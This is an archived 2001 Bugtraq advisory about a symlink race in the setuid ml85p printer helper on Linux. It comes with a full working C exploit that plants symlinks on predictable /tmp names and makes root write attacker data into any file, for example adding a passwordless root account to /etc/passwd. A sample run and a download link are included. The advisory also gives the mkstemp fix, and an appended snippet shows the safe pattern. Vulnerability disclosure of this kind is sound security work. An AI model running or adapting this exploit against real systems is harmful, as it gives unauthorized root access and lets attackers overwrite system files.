Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)

From: aleph1at_private
Date: Mon Jul 16 2001 - 22:42:30 PDT


    ----- Forwarded message from Charles Stevenson <coreat_private> -----
    
    From: Charles Stevenson <coreat_private>
    To: Bugtraq <bugtraqat_private>, chmouelat_private
    CC: Kevin Finisterre <dotslashat_private>
    Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: 
     ghostscript package)
    Date: Tue, 10 Jul 2001 16:27:39 -0600
    Message-ID: <3B4B815B.B1A65869at_private>
    
    NOTE TO MODERATOR: PLEASE HOLD UNTIL 16 JULY 2001 TO ALLOW VENDOR TIME
    TO RELEASE AN UPDATE
    
    Author(s): Charles Stevenson, core at ezlink dot com
               Kevin Finisterre, dotslash at snosoft dot com
    
    Date Published: 2001 JULY 16
    
    Revision: 1.0
    
    Advisory ID: N/A
    
    Bugtraq ID: 3008
    
    CVE CAN: None currently assigned.
    
    Title: ml85p Linux Helper Binary for Samsung ML-85G Printer Insecure
    Temporary File Creation
    
    Class: Insecure Temporary File Creation Race Condition
    
    Remotely Exploitable: No
    
    Locally Exploitable: Yes
    
    Vulnerability Description:  
    
    The Samsung ML-85G GDI printer driver (helper binary to me;) suffers
    from insecure temporary file creation practices.  It is possible to
    create files as root which can lead to root access.
    
    Vulnerable Systems: 
    
    This exploit should be specific to the x86 architecture although rare
    cases may exist (the symlink attack is not platform dependent).  All
    systems running ml85p built from tarball are assumed to be vulnerable. 
    ml85p is also distributed by MandrakeSoft in the ghostscript RPM.  The
    permissions are more stringent and would require sys privileges.  I
    tested it on ml85p built from the tarball on my Debian system and Kevin
    tested on his Mandrake system.
    
    > [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
    > -rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*
    
    Mandrake:
    
    ghostscript-5.50-71mdk.i586.rpm
    ghostscript-5.50-67mdk.i586.rpm
    
    Solution/Vendor Information/Workaround: 
    
    The author's site and the source code can be found at: 
    
    http://members.nbci.com/rpragana/gdiprinters.html
    
    Recommended fix... use mkstemp() instead of the homegrown code:
    
    line 726:                       sprintf(gname,"/tmp/ml85g%d",time(0));
    
    Quick fix... chmod 0755 `which ml85p`
    
    Vendor notified on: 2001 JULY 10
    
    Credits: 
    
    The credit goes to my good friend Kevin Finisterre for discovering the
    vulnerability, I (Charles Stevenson) wrote the proof-of-concept exploit.
    
    This advisory was drafted with the help of the SecurityFocus.com
    Vulnerability Help Team. For more information or assistance drafting 
    advisories please mail vulnhelpat_private
    
    Technical Description - Exploit/Concept Code: 
    
    [-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned
    owned::0:0:root:/root:/bin/bash
    ml85p-xpl.c by core (c) 2001
    > backing up /etc/rc.owned to /tmp/ez.n6ZT1m
    /bin/cp: cannot stat `/etc/rc.owned': No such file or directory
    /bin/touch: getting attributes of `/etc/rc.owned': No such file or directory
    > creating a lot of symlinks
    Running a few times since I'm lazy.
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    -rw-rw-rw-    1 root     staff           0 Jul 10 13:14 /etc/rc.owned
    -rw-rw-rw-    1 root     staff          32 Jul 10 13:14 /etc/rc.owned
    owned::0:0:root:/root:/bin/bash
    > cleaning up
    Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r
    /tmp/ez.n6ZT1m /etc/rc.owned`!
    All done. Enjoy!
    
    You'll want to download this from my website or take care to reconstruct
    the lines which got wrapped.
    
    http://www.ezlink.com/~core/hot/ml85p-xpl.c
    
    /* ml85p-xpl.c
     *
     * Quick hack to exploit ml85p
     *
     * Simply run it with the file you want to create/overwrite
     * and the data you wish to place in the file.
     *
     * Example:
     *
     * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
     * $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
     *
     * Then login as owned... etc..
     *
     * by Charles Stevenson <coreat_private>
     *
     * July 10 2001
     *
     * exploit discovered by KF <dotslashat_private>
     *
     * shoutz b10z and word to Kevin for the quick tag team :)
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>
    
    #include <time.h>
    
    #define TEMPFILE "/tmp/ez.XXXXXX"
    #define BRUTE 10
    
    void usage(char*);
    
    int main(int argc, char **argv){
       char tempfile[128] = TEMPFILE;
       int fd, i;
       time_t the_time;
       char temp[512];
       
       if (argc < 3){
          usage(argv[0]);
       }
    
       if((fd = mkstemp(tempfile))==-1){
          fprintf(stderr, "Error creating %s!\n",tempfile);
          exit(1);
       }
    
       /* begin lazy slacker coding */
       fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
       fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);
    
       /* backup old file */
       sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
       system(temp);
       
       /* set the date/time */
       sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
       system(temp);
    
       the_time = time(NULL);
    
       fprintf(stderr, "> creating a lot of symlinks\n");
    
       /* ml85p names its temp file /tmp/ml85g<time(0)>; plant a symlink
        * for each of the next BRUTE seconds so the name it picks is covered */
       for (i=0;i<BRUTE;i++){
          sprintf(temp, "/tmp/ml85g%ld", (long)(the_time+i));
          symlink(argv[1], temp);
       }
       
       /* the input data is irrelevant; ml85p is only run so that it opens
        * its temp file through one of the planted symlinks */
       sprintf(temp, \
         "echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n");
       fprintf(stderr, "Running a few times since I'm lazy.\n");
       for (i=0;i<BRUTE;i++){
          system(temp);
       }
    
       sprintf(temp, "/bin/ls -l %s", argv[1]);
       system(temp);
    
       sprintf(temp, "echo \"%s\" > %s", argv[2], argv[1]);
       system(temp);
    
       sprintf(temp, "/bin/ls -l %s", argv[1]);
       system(temp);
    
       sprintf(temp, "/bin/cat %s", argv[1]);
       system(temp);
    
       fprintf(stderr, "> cleaning up\n");
       sprintf(temp, "/bin/rm -f /tmp/ml85*");
       system(temp);
    
       fprintf(stderr, \
         "Don't forget to `cp %s %s && touch -r %s %s`!\n",tempfile,\
         argv[1], tempfile, argv[1]);
       
       fprintf(stderr, "All done. Enjoy!\n");
       return 0;
    }
    
    void usage(char *name){
       
       fprintf(stderr, "usage: %s <filename> <data>\n", name);
       exit(1);
    }
    
    /* EOF */
    
    Disclaimer: 
    
    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an as is condition.
    There are no warranties with regard to this information. In no event
    shall the author(s) be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use of
    this information is at the user's own risk.
    
    ----- End forwarded message -----
    
    -- 
    Elias Levy
    SecurityFocus.com
    http://www.securityfocus.com/
    Si vis pacem, para bellum
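The advisory's recommended fix (mkstemp() in place of the time(0)-derived name at line 726) as an added example, not code from the advisory or from the ml85p driver: the predictable-name pattern beside the mkstemp() version, each run inside a private mkdtemp() directory so nothing outside it is touched. The directory, "victim" file and "ml85g" prefix are constructed here and assume a writable /tmp.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sys/stat.h>

/* The ml85p pattern: a name anyone can guess from the clock, then opened with
 * fopen("w"), which follows whatever symlink already sits at that name.
 * Returns 1 if the write landed in "victim" instead of a fresh temp file. */
int predictable_tmp_is_hijackable(void) {
    char dir[] = "/tmp/ml85demo.XXXXXX", link[256], victim[256];
    struct stat st;
    if (!mkdtemp(dir)) return -1;                       /* constructed sandbox */
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)time(NULL));
    symlink(victim, link);                              /* planted before the open */
    FILE *fp = fopen(link, "w");                        /* the driver's own open */
    if (fp) { fputs("printer data\n", fp); fclose(fp); }
    int hijacked = stat(victim, &st) == 0 && st.st_size > 0;
    unlink(link); unlink(victim); rmdir(dir);
    return hijacked;
}

/* The fix: mkstemp() opens with O_CREAT|O_EXCL, so it never reuses an existing
 * path (symlink or not) and the name is not derived from the clock. The fstat/
 * lstat checks confirm the descriptor really is a fresh regular file at that
 * path. Returns 1 when every check passes, 0 if one fails, -1 on error. */
int mkstemp_tmp_is_safe(void) {
    char dir[] = "/tmp/ml85demo.XXXXXX", path[256];
    struct stat fst, lst;
    if (!mkdtemp(dir)) return -1;
    snprintf(path, sizeof path, "%s/ml85g.XXXXXX", dir);
    int fd = mkstemp(path);
    if (fd < 0) { rmdir(dir); return -1; }
    fchmod(fd, 0600);                                   /* old libcs used 0666 */
    int ok = fstat(fd, &fst) == 0 && lstat(path, &lst) == 0
          && S_ISREG(fst.st_mode) && !S_ISLNK(lst.st_mode)
          && fst.st_ino == lst.st_ino                   /* fd is the file at path */
          && fst.st_nlink == 1 && fst.st_uid == getuid();
    close(fd); unlink(path); rmdir(dir);
    return ok;
}
```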
    



    This archive was generated by hypermail 2b30 : Mon Jul 16 2001 - 22:49:31 PDT